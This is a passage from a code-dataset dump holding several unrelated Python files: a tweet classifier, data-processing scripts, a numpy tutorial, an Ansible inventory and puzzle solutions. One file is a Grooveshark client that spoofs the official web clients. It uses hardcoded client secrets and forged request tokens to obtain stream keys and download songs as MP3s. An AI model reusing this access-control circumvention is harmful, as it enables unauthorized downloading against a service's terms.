\"\\n\")\n print(t[0] + \": \" + str(impacted))\n \n res.close()\n\nprint('END SCRIPT')\n\n","sub_path":"naive_bayes.py","file_name":"naive_bayes.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"629790620","text":"from NaiveBayes import Pool\nimport os\nDClasses = [\"acute\",\"allergies\",\"cancer\",\"fever\",\"heart disease\",\"signs\",\"ulcers\"]\nbase = \"learn/\"\np = Pool()\nfor i in DClasses:\n print(i)\n p.learn(base + i, i)\nbase = \"test/\"\nfor i in DClasses:\n dir = os.listdir(base + i)\n for file in dir:\n res = p.Probability(base + i + \"/\" + file)\n print(i + \": \" + file + \": \" + str(res))\ndir = os.listdir(base + f)\nfor file in dir:\n res = p.Probability(base + f + \"/\" + file)\n print(f + \": \" + file + \": \" +str(res))\n","sub_path":"nb2.py","file_name":"nb2.py","file_ext":"py","file_size_in_byte":525,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"486214431","text":"import urllib2\nimport json\nimport string\nimport hashlib\nimport uuid\nimport os\nimport cookielib\nimport gzip\nimport 
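naive_bayes.py above re-opens and scans both dictionary CSVs once per word per tweet. Loading each dictionary into a dict gives the same log-probability sums (the stored value when the word is present, log(1/word_count) otherwise) in a single pass. A sketch assuming the paths and counts defined in that script:

import csv
import math

def load_logprobs(path):
    with open(path) as f:
        return {row[0]: float(row[1]) for row in csv.reader(f)}

impact = load_logprobs(impact_dict)
nonimpact = load_logprobs(nonimpact_dict)
imp_default = math.log(1 / impact_word_count)
non_default = math.log(1 / nonimpact_word_count)

def is_impact(words):
    words = [w for w in words if w != '' and len(w) > 3]
    imp = sum(impact.get(w, imp_default) for w in words)
    non = sum(nonimpact.get(w, non_default) for w in words)
    return imp > non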
StringIO\nimport random\nimport re\nimport math\nimport time\nimport downloadHandler\nfrom urlgrabber.keepalive import HTTPHandler\n\nclass grooveshark:\n '''Handles all the network stuff'''\n\n downloader = downloadHandler.downloadHandler()\n\n URL = \"https://grooveshark.com\"\n USERAGENT = \"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:12.0) Gecko/20100101 Firefox/12.0\"\n COOKIEFILE = \"groovy.cookie\"\n\n jsQueue = {}\n jsQueue[\"client\"] = \"jsqueue\"\n jsQueue[\"clientRevision\"] = \"20120312.08\"\n jsQueue[\"secret\"] = \"circlesAndSquares\"\n jsQueue[\"headers\"] = {\n \"User-Agent\":USERAGENT,\n \"Host\":\"grooveshark.com\",\n \"Accept-Encoding\":\"gzip, deflate\",\n \"Content-Type\":\"application/json\",\n \"Accept-Language\":\"da,en-us;q=0.7,en;q=0.3\"\n }\n\n htmlshark = {}\n htmlshark[\"client\"] = \"htmlshark\"\n htmlshark[\"clientRevision\"] = \"20120312\"\n htmlshark[\"secret\"] = \"reallyHotSauce\"\n htmlshark[\"headers\"] = {\n \"User-Agent\":USERAGENT,\n \"Host\":\"grooveshark.com\",\n \"Accept-Encoding\":\"gzip, deflate\",\n \"Content-Type\":\"application/json\",\n \"Accept-Language\":\"da,en-us;q=0.7,en;q=0.3\"\n }\n\n #Setting the static header (Country, session and uuid)\n h = {}\n h[\"country\"] = {}\n h[\"country\"][\"CC1\"] = 72057594037927940\n h[\"country\"][\"CC2\"] = 0\n h[\"country\"][\"CC3\"] = 0\n h[\"country\"][\"CC4\"] = 0\n h[\"country\"][\"ID\"] = 57\n h[\"country\"][\"IPR\"] = 0\n h[\"privacy\"] = 0\n h[\"uuid\"] = str.upper(str(uuid.uuid4()))\n\n token = None\n session = None\n userTrackingID = None\n queueID = None\n cj = None\n tokenExpires = None\n\n def __init__(self):\n self.installHandlers()\n self.getSession()\n self.doCrossdomainRequest()\n self.getToken()\n self.getCountry()\n self.generateQueueID()\n\n def installHandlers(self):\n global cj\n #Install support for KeepAlive and HTTP/1.1, via urlgrabber (older versions) \n keepalive_handler = HTTPHandler()\n opener = urllib2.build_opener(keepalive_handler)\n urllib2.install_opener(opener)\n\n #Install cookielib for easy cookie management\n self.cj = cookielib.LWPCookieJar()\n opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(self.cj))\n urllib2.install_opener(opener)\n\n #Proxy stuff, used for testing, might be added at a later date\n #proxy = urllib2.ProxyHandler({\"https\":\"119.252.160.34:8000\"})\n #opener = urllib2.build_opener(proxy)\n #urllib2.install_opener(opener)\n\n def parseMainPage(self, html):\n global userTrackingID\n matchObj = re.search(r'\"userTrackingID\":[^}]*', html, re.I|re.M)\n if matchObj:\n matchObj = re.search(r\"[0123456789]+\", matchObj.group(), re.I|re.M)\n if matchObj:\n self.userTrackingID = matchObj.group()\n return\n raise SyntaxError(\"TrackingID not found\")\n\n def readSession(self):\n for cookie in self.cj:\n if cookie.name == \"PHPSESSID\":\n session = cookie.value\n return session\n return\n\n def doCrossdomainRequest(self):\n req = urllib2.Request(self.URL + \"/crossdomain.xml?20120312.08\")\n page = urllib2.urlopen(req)\n page.read()\n\n def getSession(self):\n global session\n\n if os.path.isfile(self.COOKIEFILE):\n self.cj.load(self.COOKIEFILE)\n req = urllib2.Request(self.URL)\n page = urllib2.urlopen(req)\n self.parseMainPage(page.read())\n self.session = self.readSession()\n self.cj.save(self.COOKIEFILE)\n\n def getCountry(self):\n p = {}\n p[\"header\"] = {}\n p[\"header\"][\"session\"] = self.session\n p[\"header\"][\"client\"] = self.jsQueue[\"client\"]\n p[\"header\"][\"clientRevision\"] = self.jsQueue[\"clientRevision\"]\n 
p[\"header\"][\"token\"] = self.generateToken(\"getCountry\", self.jsQueue[\"secret\"])\n p[\"header\"][\"privacy\"] = self.h[\"privacy\"]\n p[\"header\"][\"uuid\"] = self.h[\"uuid\"]\n p[\"method\"] = \"getCountry\"\n p[\"parameters\"] = {}\n page = urllib2.urlopen(self.createRequest(p, self.jsQueue))\n self.h[\"country\"] = json.JSONDecoder().decode(gzip.GzipFile(fileobj=(StringIO.StringIO(page.read()))).read())[\"result\"]\n\n\n def createHeader(self, data, client, method = None):\n data[\"header\"] = self.h\n data[\"header\"][\"session\"] = self.session\n data[\"header\"][\"client\"] = client[\"client\"]\n data[\"header\"][\"clientRevision\"] = client[\"clientRevision\"]\n if method:\n data[\"header\"][\"token\"] = self.generateToken(method, client[\"secret\"])\n data[\"method\"] = method\n return data\n\n def createRequest(self, data, client):\n return urllib2.Request(self.URL + \"/more.php?\" + data[\"method\"], json.JSONEncoder().encode(data), client[\"headers\"])\n\n def generateQueueID(self):\n global queueID\n part1 = self.userTrackingID + str(math.floor(time.time()))\n part2 = str(math.floor(random.random() * 500))\n while len(part2)<3:\n part2 = \"0\" + part2\n self.queueID = part1 + part2\n\n def generateToken(self, methodName, secret):\n if (self.tokenExpires and self.tokenExpires > time.time()):\n rnd = (''.join(random.choice(string.hexdigits) for x in range(6))).lower()\n return rnd + hashlib.sha1('%s:%s:%s:%s' % (methodName, self.token, secret, rnd)).hexdigest()\n else:\n self.getToken()\n return self.generateToken(methodName, secret)\n\n def getToken(self):\n global token, tokenExpires\n p = {}\n p[\"parameters\"] = {}\n p[\"parameters\"][\"secretKey\"] = hashlib.md5(self.session).hexdigest()\n p[\"method\"] = \"getCommunicationToken\"\n p = self.createHeader(p, self.htmlshark)\n page = urllib2.urlopen(self.createRequest(p, self.htmlshark))\n result = json.JSONDecoder().decode(gzip.GzipFile(fileobj=(StringIO.StringIO(page.read()))).read())[\"result\"]\n if result:\n self.tokenExpires = time.time() + (60 * 25)\n self.token = result\n else:\n raise KeyError(\"Couldn't get token\")\n\n def getResultsFromSearch(self, query, what=\"Songs\"):\n p = {}\n p[\"parameters\"] = {}\n p[\"parameters\"][\"type\"] = what\n p[\"parameters\"][\"query\"] = query\n p = self.createHeader(p, self.htmlshark, \"getResultsFromSearch\")\n page = urllib2.urlopen(self.createRequest(p, self.htmlshark))\n j = json.JSONDecoder().decode(gzip.GzipFile(fileobj=(StringIO.StringIO(page.read()))).read())\n try:\n return j[\"result\"][\"result\"][\"Songs\"]\n except:\n return j[\"result\"][\"result\"]\n\n def getStreamKeyFromSongIDEx(self, id):\n p = {}\n p[\"parameters\"] = {}\n p[\"parameters\"][\"type\"] = 0\n p[\"parameters\"][\"mobile\"] = False\n p[\"parameters\"][\"prefetch\"] = False\n p[\"parameters\"][\"songID\"] = id\n p[\"parameters\"][\"country\"] = self.h[\"country\"]\n p = self.createHeader(p, self.jsQueue, \"getStreamKeyFromSongIDEx\")\n page = urllib2.urlopen(self.createRequest(p, self.jsQueue))\n return json.JSONDecoder().decode(gzip.GzipFile(fileobj=(StringIO.StringIO(page.read()))).read())[\"result\"]\n\n def addSongsToQueue(self, songObj, source = \"user\"): \n queueObj = {}\n queueObj[\"songID\"] = songObj[\"SongID\"]\n queueObj[\"artistID\"] = songObj[\"ArtistID\"]\n queueObj[\"source\"] = source\n queueObj[\"songQueueSongID\"] = 1\n \n p = {}\n p[\"parameters\"] = {}\n p[\"parameters\"][\"songIDsArtistIDs\"] = []\n p[\"parameters\"][\"songIDsArtistIDs\"].append(queueObj)\n 
p[\"parameters\"][\"songQueueID\"] = self.queueID\n p = self.createHeader(p, self.jsQueue, \"addSongsToQueue\")\n page = urllib2.urlopen(self.createRequest(p, self.jsQueue))\n return json.JSONDecoder().decode(gzip.GzipFile(fileobj=(StringIO.StringIO(page.read()))).read())[\"result\"]\n\n def removeSongsFromQueue(self, userRemoved = True):\n p = {}\n p[\"parameters\"] = {}\n p[\"parameters\"][\"songQueueID\"] = self.queueID\n p[\"parameters\"][\"userRemoved\"] = True\n p[\"parameters\"][\"songQueueSongIDs\"]=[1]\n p = self.createHeader(p, self.jsQueue, \"removeSongsFromQueue\")\n page = urllib2.urlopen(self.createRequest(p, self.jsQueue))\n return json.JSONDecoder().decode(gzip.GzipFile(fileobj=(StringIO.StringIO(page.read()))).read())[\"result\"]\n\n def markSongDownloadedEx(self, streamServer, songID, streamKey):\n p = {}\n p[\"parameters\"] = {}\n p[\"parameters\"][\"streamServerID\"] = streamServer\n p[\"parameters\"][\"songID\"] = songID\n p[\"parameters\"][\"streamKey\"] = streamKey\n p = self.createHeader(p, self.jsQueue, \"markSongDownloadedEx\")\n page = urllib2.urlopen(self.createRequest(p, self.jsQueue))\n return json.JSONDecoder().decode(gzip.GzipFile(fileobj=(StringIO.StringIO(page.read()))).read())[\"result\"]\n\n def markSongQueueSongPlayed(self, streamServerID, streamKey, songID):\n p = {}\n p[\"parameters\"] = {}\n p[\"parameters\"][\"streamServerID\"] = streamServerID\n p[\"parameters\"][\"streamKey\"] = streamKey\n p[\"parameters\"][\"songQueueSongID\"] = 1\n p[\"parameters\"][\"songQueueID\"] = self.queueID\n p[\"parameters\"][\"songID\"] = songID\n p = self.createHeader(p, self.jsQueue, \"markSongQueueSongPlayed\")\n page = urllib2.urlopen(self.createRequest(p, self.jsQueue))\n return json.JSONDecoder().decode(gzip.GzipFile(fileobj=(StringIO.StringIO(page.read()))).read())[\"result\"]\n\n def download(self, search, choice, callBack = None):\n try:\n songid = int(choice)\n except:\n raise SyntaxError(\"Failed to convert choice to int\")\n\n \n self.addSongsToQueue(search[songid]) #Add the song to the queue\n \n stream = self.getStreamKeyFromSongIDEx(search[songid][\"SongID\"]) #Get the StreamKey for the selected song\n if stream == None:\n raise Exception(\"StreamKey not found\")\n\n #markTimer = threading.Timer(30 + random.randint(0,5), self.markStreamKeyOver30Seconds, [search[choice][\"SongID\"], str(self.queueID), stream[\"ip\"], stream[\"streamKey\"]])\n #markTimer.start()\n data = {\"streamKey\":stream[\"streamKey\"]}\n headers = {\"Accept-Encoding\":\"gzip, deflate\", \"Host\":stream[\"ip\"], \"User-Agent\":self.USERAGENT}\n try:\n \n\n self.markSongDownloadedEx(stream[\"ip\"], search[songid][\"SongID\"], stream[\"streamKey\"])\n\n self.downloader.download((\"http://%s/stream.php\" % (stream[\"ip\"])), (\"%s - %s.mp3\" % (search[songid][\"ArtistName\"], search[songid][\"SongName\"])), data, headers, callBack)\n \n self.markSongQueueSongPlayed(stream[\"ip\"], stream[\"streamKey\"], search[songid][\"SongID\"])\n\n self.removeSongsFromQueue()\n\n except KeyboardInterrupt:\n\n os.remove('%s - %s.mp3' % (search[songid][\"ArtistName\"], search[songid][\"SongName\"]))\n\n self.markSongDownloadedEx(stream[\"ip\"], search[songid][\"SongID\"], stream[\"streamKey\"])\n","sub_path":"python/groovylib/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"542538888","text":"# Script to get Gen 3 initial seeds from a target seed\r\n\r\nimport 
LCRNG\r\n\r\nprint(\"------------------------\")\r\nmaxAdvances = int(input(\"Max Advances: \"))\r\ntargetSeed = int(input(\"Target Seed: 0x\"),16)\r\nprint(\"------------------------\")\r\n\r\nadvances = 0\r\nrng = LCRNG.PokeRNGR(targetSeed)\r\nseeds = []\r\nwhile (advances <= maxAdvances):\r\n    rng.nextUInt()\r\n    advances += 1\r\n    if rng.seed < 0xFFFF:\r\n        print(advances,hex(rng.seed))\r\n        seeds.append(hex(rng.seed))\r\n\r\nprint(seeds)","sub_path":"gen3_initial_seed_finder.py","file_name":"gen3_initial_seed_finder.py","file_ext":"py","file_size_in_byte":487,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"532982716","text":"import time\nimport wifi_Functions\nimport subprocess\n\n\"\"\"\na = 3\nb = 4\n\nstart = time.time()\nsubprocess.call(['python','flag_init.py']) # [rpi_flags][pi_flags.pkl]\nend = time.time()\nprint(end - start)\n\"\"\"\n\nwhile True:\n    try:\n        fp = open('htc.txt', 'r')\n    except EOFError:\n        print('eoferror')\n    except IOError:\n        print('ioerror')\n    print('out of try')\n\n","sub_path":"resources/timetest.py","file_name":"timetest.py","file_ext":"py","file_size_in_byte":375,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"389100360","text":"import numpy as np\r\na = np.array([1,2,3])\r\nprint(a)\r\na = np.array([[1,2],[3,4]])\r\nprint(a)\r\na.shape\r\na.size\r\na.reshape(4,1)\r\na.reshape(1,4)\r\na = np.arange(24)\r\nprint(a)\r\na.shape\r\na.reshape(24,1)\r\na.reshape(1,24)\r\na.reshape(4,6)\r\nprint(a.reshape(3,2,4))\r\na.ndim\r\na.reshape(3,2,4).ndim\r\na = np.zeros([3,2])\r\nprint(a)\r\na = np.zeros([3,2],dtype=int)\r\nprint(a)\r\na = np.zeros([3,2],dtype=complex)\r\nprint(a)\r\na = np.ones([3,2],dtype=int)\r\nprint(a)\r\na = np.eye(5)\r\na=np.full([3,2],7)\r\nprint(a)\r\na = np.random.randint(4)\r\nprint(a)\r\na = np.array([[1,2],[3,4]])\r\nb = np.empty_like(a)\r\nprint(b)\r\na = [1,2,3,4,5,6,7,8,9,10]\r\nb = np.delete(a,[2,4,6]) #deletes the indexed values\r\nprint(b)\r\na = np.array([[1,2,3],[4,5,6],[7,8,9]])\r\nlen(a)\r\nb = np.delete(a,[1])\r\nprint(b)\r\nb = np.delete(a,[1],axis=0)\r\nprint(b)\r\nb = np.delete(a,[1],axis=1)\r\nprint(b)\r\n","sub_path":"Code/numerical.py","file_name":"numerical.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"590882429","text":"#! 
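The seed finder above needs an external LCRNG module. For readers without it, a self-contained stand-in for PokeRNGR, assuming the widely documented Gen 3 LCG next = seed * 0x41C64E6D + 0x6073 (mod 2^32); stepping backwards just multiplies by the modular inverse (pow(a, -1, m) needs Python 3.8+):

class PokeRNGR:
    MULT_INV = pow(0x41C64E6D, -1, 2 ** 32)  # modular inverse of the forward multiplier

    def __init__(self, seed):
        self.seed = seed & 0xFFFFFFFF

    def nextUInt(self):
        # undo one forward step: prev = (seed - increment) * a**-1 (mod 2**32)
        self.seed = ((self.seed - 0x6073) * self.MULT_INV) & 0xFFFFFFFF
        return self.seed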
/usr/bin/python\n\n# Copyright (c) 2010-2016 OpenStack Foundation\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or\n# implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nimport argparse\nimport json\n\nfrom ansible_storlet_management_vars import mgmt_vars\n\n\nclass Inventory(object):\n\n '''\n Ansible inventory , generated from config file\n '''\n def __init__(self, fname):\n self.__load_config__(fname)\n\n def __load_config__(self, name):\n with open(name) as f:\n self.conf = json.loads(f.read())\n\n def show_list(self):\n g = {}\n for group in ['storlet-mgmt', 'storlet-proxy', 'storlet-storage',\n 'docker']:\n g[group] = dict()\n g[group]['hosts'] = self.conf['groups'][group]\n g[group]['vars'] = dict()\n g[group]['vars'].update(self.conf['all'])\n return g\n\n def show_host(self, name):\n res = dict()\n res['ansible_ssh_user'] = self.conf['all']['ansible_ssh_user']\n return res\n\n def write_inventory(self, inventory_file):\n inventory = dict()\n inventory['groups'] = self.conf['groups']\n for group in ['storlet-mgmt', 'storlet-proxy', 'storlet-storage',\n 'docker']:\n for host in self.conf['groups'][group]:\n if host not in inventory:\n inventory[host] = dict()\n if group == 'storlet-mgmt':\n inventory[host]['ansible_ssh_user'] =\\\n self.conf['all']['storlets_management_user']\n else:\n inventory[host]['ansible_ssh_user'] =\\\n self.conf['all']['ansible_ssh_user']\n\n all_vars = dict()\n for v in mgmt_vars:\n all_vars[v] = self.conf['all'][v]\n inventory['all'] = all_vars\n\n with open(inventory_file, 'w') as f:\n f.write(json.dumps(inventory))\n\n return inventory\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('--list', action='store_true')\n parser.add_argument('--host')\n parser.add_argument('--inventory')\n args = parser.parse_args()\n inventory = Inventory('deploy/cluster_config.json')\n out = {}\n if args.list:\n out = inventory.show_list()\n\n if args.host:\n out = inventory.show_host(args.host)\n\n if args.inventory:\n out = inventory.write_inventory(args.inventory)\n\n print(json.dumps(out))\n\nif __name__ == '__main__':\n main()\n","sub_path":"install/storlets/management/storlets_dynamic_inventory.py","file_name":"storlets_dynamic_inventory.py","file_ext":"py","file_size_in_byte":2969,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"73233567","text":"import pandas as pd\r\nimport numpy as np\r\nfrom datetime import datetime\r\n\r\n#adds tom swinfield's extracted LiDAR points\r\n\r\ndef combineDatasets(vegplotdata,lidar_topo,lidar_PAI,lidar_tch,dataloggers,allpoints,outfile):\r\n\t'''\r\n\tcombines the vegplot, lidar topography, lidar PAI and lidar tch datasets with the dailyData\r\n\t(dailyData is summarised datalogger data by point and date)\r\n\t'''\r\n\r\n\t#open files\r\n\ttopo=pd.read_csv(lidar_topo)\r\n\tPAI=pd.read_csv(lidar_PAI)\r\n\ttch=pd.read_csv(lidar_tch)\r\n\tveg=pd.read_csv(vegplotdata)\r\n\tdata=pd.read_csv(dataloggers)\r\n\txl=pd.ExcelFile(allpoints)\r\n\twidths=xl.parse('SAFEPoints.txt')\r\n\r\n\t#extract headers of veg 
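The script above implements Ansible's dynamic-inventory contract (--list and --host) plus a custom --inventory writer, all driven by deploy/cluster_config.json. Exercising the class in-process, assuming that config file exists:

inv = Inventory('deploy/cluster_config.json')
groups = inv.show_list()
print(groups['storlet-mgmt']['hosts'])
print(inv.show_host('node-1'))  # 'node-1' is a hypothetical host name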
and lidar variables\r\n\ttopoHeaders=topo.columns[4:]\r\n\r\n\tPAIHeaders=PAI.columns[3:]\r\n\r\n\ttchHeaders=tch.columns[4:]\r\n\r\n\tvegHeaders=veg.columns[2:]\r\n\r\n\t###change point codes in lidar files to have a 0 before the point number\r\n\tfor i in topo.index:\r\n\t\ttopo.loc[i,'site']=str(topo.loc[i,'site'].split('-')[0])+'-0'+str(topo.loc[i,'site'].split('-')[1])\r\n\t\ttopo.loc[i,'site_point'] = str(topo.loc[i,'site']) + '-' + str(topo.loc[i,'point']).lower().replace(\" \", \"\")\r\n\tfor i in PAI.index:\r\n\t\tPAI.loc[i,'site']=str(PAI.loc[i,'site'].split('-')[0])+'-0'+str(PAI.loc[i,'site'].split('-')[1])\r\n\t\tPAI.loc[i,'site_point'] = str(PAI.loc[i,'site']) + '-' + str(PAI.loc[i,'point']).lower().replace(\" \", \"\")\r\n\tfor i in topo.index:\r\n\t\ttch.loc[i,'site']=str(topo.loc[i,'site'].split('-')[0])+'-0'+str(tch.loc[i,'site'].split('-')[1])\r\n\t\ttch.loc[i,'site_point'] = str(tch.loc[i,'site']) + '-' + str(tch.loc[i,'point']).lower().replace(\" \", \"\")\r\n\r\n\tfor i in topoHeaders: #create new columns in dataframe with lidar variables\r\n\t\tdata[i]=''\r\n\tfor i in PAIHeaders: #create new columns in dataframe with lidar variables\r\n\t\tdata[i]=''\r\n\tfor i in tchHeaders: #create new columns in dataframe with lidar variables\r\n\t\tdata[i]=''\r\n\tfor i in vegHeaders: #create new columns in dataframe with veg variables\r\n\t\tdata[i]=''\r\n\r\n\tprint('Creating column of river points to match against lidar data.')\r\n\t#makes a column to match up the logger data to veg and lidar data with\r\n\tfor i in data.index:\r\n\t\tif str(data.loc[i,'Point']) != '10':\r\n\t\t\tdata.loc[i,'RiverPointCode'] = data.loc[i,'River'].upper() + '-0' + str(data.loc[i,'Point'])\r\n\t\telse:\r\n\t\t\tdata.loc[i,'RiverPointCode'] = data.loc[i,'River'].upper() + '-'+str(data.loc[i,'Point'])\r\n\r\n\t\tdata.loc[i,'RiverPointPositionCode'] = data.loc[i,'RiverPointCode'] + '-' + str(data.loc[i,'Position']).lower()\r\n\r\n\r\n\tprint('Search through lidar databases matching sites and appending data.')\r\n\tfor i in topo.index:\r\n\t\tfor j in data.index:\r\n\t\t\tif topo.loc[i,'site_point']==data.loc[j,'RiverPointPositionCode']:\r\n\t\t\t\tfor k in topoHeaders:\r\n\t\t\t\t\tdata.loc[j,k]=topo.loc[i,k]\r\n\r\n\tfor i in PAI.index:\r\n\t\tfor j in data.index:\r\n\t\t\tif PAI.loc[i,'site_point']==data.loc[j,'RiverPointPositionCode']:\r\n\t\t\t\tfor k in PAIHeaders:\r\n\t\t\t\t\tdata.loc[j,k]=PAI.loc[i,k]\r\n\r\n\tfor i in tch.index:\r\n\t\tfor j in data.index:\r\n\t\t\tif tch.loc[i,'site_point']==data.loc[j,'RiverPointPositionCode']:\r\n\t\t\t\tfor k in tchHeaders:\r\n\t\t\t\t\tdata.loc[j,k]=tch.loc[i,k]\r\n\r\n\tprint('Search through vegplot database matching sites and appending data.')\r\n\tfor i in veg.index: #searches through the lidar database for matching sites and appends veg data to dataloggers data\r\n\t\tfor j in data.index:\r\n\t\t\tif veg.loc[i,'Plot #']==data.loc[j,'RiverPointCode']:\r\n\t\t\t\tfor k in vegHeaders:\r\n\t\t\t\t\tdata.loc[j,k]=veg.loc[i,k]\r\n\r\n\t# '''\r\n\t# Generate landuse bins for plotting purposes and generate distances from the buffer edge and river for each file\r\n\t# '''\r\n\t#\r\n\t# data=append_site_data(data,widths)\r\n\t#\r\n\t# #create empty distance columns for OP and CF that will not have matches.\r\n\t# data['Distance_from_edge']=''\r\n\t# data['Distance_from_river']=''\r\n\t#\r\n\t# for i in data.index:\r\n\t# \tif data.loc[i, 'Position']=='buffer5m':\r\n\t# \t\tif data.loc[i,'width']!='':\r\n\t# \t\t\tif data.loc[i,'width']>=5:\r\n\t# 
\t\t\t\tdata.loc[i,'Distance_from_edge']=data.loc[i,'width']-5\r\n\t# \t\t\t\tdata.loc[i,'Distance_from_river']=5\r\n\t# \t\t\telse:\r\n\t# \t\t\t\tdata.loc[i,'LandUse']='?'\r\n\t#\r\n\t# \telif data.loc[i,'Position']=='buffer15m':\r\n\t# \t\tif data.loc[i,'width']!='':\r\n\t# \t\t\tif data.loc[i,'width']>=15:\r\n\t# \t\t\t\tdata.loc[i,'Distance_from_edge']=data.loc[i,'width']-15\r\n\t# \t\t\t\tdata.loc[i,'Distance_from_river']=15\r\n\t# \t\t\telse:\r\n\t# \t\t\t\tdata.loc[i,'LandUse']='?'\r\n\t#\r\n\t# \telif data.loc[i,'Position']=='bufferedge':\r\n\t# \t\tif data.loc[i,'width']!='':\r\n\t# \t\t\tif data.loc[i,'width']>=25: #if more than 5m from previous logger\r\n\t# \t\t\t\tdata.loc[i,'Distance_from_edge']=5\r\n\t# \t\t\t\tdata.loc[i,'Distance_from_river']=(data.loc[i,'width'])-5\r\n\t# \t\t\telif data.loc[i,'width']>=20: #otherwise if not more than 5m from logger\r\n\t# \t\t\t\tdata.loc[i,'Distance_from_edge']=5\r\n\t# \t\t\t\tdata.loc[i,'Distance_from_river']=(data.loc[i,'width'])\r\n\t# \t\t\t\tdata.loc[i,'LandUse']='?'\r\n\t# \t\t\telse:\r\n\t# \t\t\t\tdata.loc[i,'LandUse']='?'\r\n\t#\r\n\t#\r\n\t# \tif data.loc[i,'River']=='ROP2' or data.loc[i,'River']=='ROP10':\r\n\t# \t\t\t\tdata.loc[i,'LandUseBins']='RR=0'\r\n\t# \telif data.loc[i,'LandUse']!='RR':\r\n\t# \t\tdata.loc[i,'LandUseBins']=data.loc[i,'LandUse']\r\n\t#\r\n\t#\r\n\t# \telif data.loc[i,'width']!='' and data.loc[i,'Distance_from_edge']!='' and data.loc[i,'Distance_from_river']!='':\r\n\t# \t\tif data.loc[i, 'Distance_from_edge']<30:\r\n\t# \t\t\tdata.loc[i,'LandUseBins']='RR<30m'\r\n\t# \t\telif data.loc[i,'Distance_from_edge']<60:\r\n\t# \t\t\tdata.loc[i,'LandUseBins']='RR<60m'\r\n\t# \t\telif data.loc[i, 'Distance_from_edge']<90:\r\n\t# \t\t\tdata.loc[i,'LandUseBins']='RR<90m'\r\n\t# \t\telif data.loc[i, 'Distance_from_edge']>=90:\r\n\t# \t\t\tdata.loc[i,'LandUseBins']='RR90m+'\r\n\t#\r\n\t# \telse:\r\n\t# \t\tdata.loc[i,'LandUseBins']='RR_UnknownWidth'\r\n\t#\r\n\r\n\tdata.to_csv(outfile, sep=',')\r\n\r\n\tprint('Saved as ' + outfile)\r\n\r\ndef append_site_data(infile,allpoints):\r\n\t'''\r\n\tadd columns to each logger file with the buffer width and the gps elevation for the point\r\n\t'''\r\n\t#read in the widths data and the infile\r\n\tdata=infile\r\n\twidths=allpoints\r\n\r\n\t#generate code for each line of the width file to match against the logger files\r\n\tfor i in widths.index:\r\n\t\tif str(widths.loc[i,'name'])[:3]=='SJI':\r\n\t\t\twidths.loc[i,'name']=str(widths.loc[i,'name'])[:4]+'-'+str(widths.loc[i,'name'])[-2:]\r\n\r\n\t\t#rr12 and rr14 are just down as r12 and r14 in the width file for some reason\r\n\t\telif str(widths.loc[i,'name'])[:3]=='R12' or str(widths.loc[i,'name'])[:3]=='R14':\r\n\t\t\twidths.loc[i,'name']='R'+str(widths.loc[i,'name'][:3])+'-'+str(widths.loc[i,'name'])[-2:]\r\n\t\telif str(widths.loc[i,'name'])[:2]=='RR':\r\n\t\t\tif str(widths.loc[i,'name'])[3]==' ':\r\n\t\t\t\twidths.loc[i,'name']=str(widths.loc[i,'name'])[:3]+'-'+str(widths.loc[i,'name'])[-2:]\r\n\t\t\telif str(widths.loc[i,'name'])[4]==' ':\r\n\t\t\t\twidths.loc[i,'name']=str(widths.loc[i,'name'])[:4]+'-'+str(widths.loc[i,'name'])[-2:]\r\n\t\t#if not a riparian buffer, do not create a name to match\r\n\t\telse:\r\n\t\t\tpass\r\n\r\n\t#match up the width and elevation to the logger file, if no match found still create column but empty\r\n\tx=0\r\n\tfor i in widths.index:\r\n\t\tif x==0:\r\n\t\t\tif 
widths.loc[i,'name']==data.loc[0,'RiverPointCode']:\r\n\t\t\t\tdata['width']=widths.loc[i,'width']\r\n\t\t\t\tdata['GPS_ele']=widths.loc[i,'GPS_ele']\r\n\t\t\t\tx=1\r\n\tif x==0:\r\n\t\tdata['width']=''\r\n\t\tdata['GPS_ele']=''\r\n\r\n\t#return the dataframe to feed into next function\r\n\treturn data\r\n","sub_path":"lidar_veg_point_TS.py","file_name":"lidar_veg_point_TS.py","file_ext":"py","file_size_in_byte":7237,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"336508037","text":"value = int(input(\"Type in the goal number: \"))\r\nx = 1\r\ndoubleValue = 0\r\nsingleValue = 0\r\n\r\n\r\nwhile x < value:\r\n    x = x * 2\r\n    doubleValue += 1\r\n\r\n\r\nif x == value:\r\n    print(\"Done, you just have to double\", doubleValue, \"times\")\r\nelif x > value:\r\n    x = x / 2\r\n    doubleValue -= 1\r\n\r\n    while x < value:\r\n        x = x + 1\r\n        singleValue += 1\r\n    print(\"Done, you have to double\", doubleValue, \"and add one\", singleValue, \"times\")\r\n","sub_path":"My original work/number-check.py","file_name":"number-check.py","file_ext":"py","file_size_in_byte":442,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"59"} +{"seq_id":"277323568","text":"# -*- encoding: utf-8 -*-\n# @File: 0803.py \n# @Time: 2020-07-31 11:20\n# @Author: ZHANG\n# @Description: 0803\n\n\nclass Solution:\n    \"\"\"Brute force\"\"\"\n    # def findMagicIndex(self, nums) -> int:\n    #     for ind, v in enumerate(nums):\n    #         if ind == v:\n    #             return ind\n    #     return -1\n\n    \"\"\"Binary-search pruning: binary search + divide and 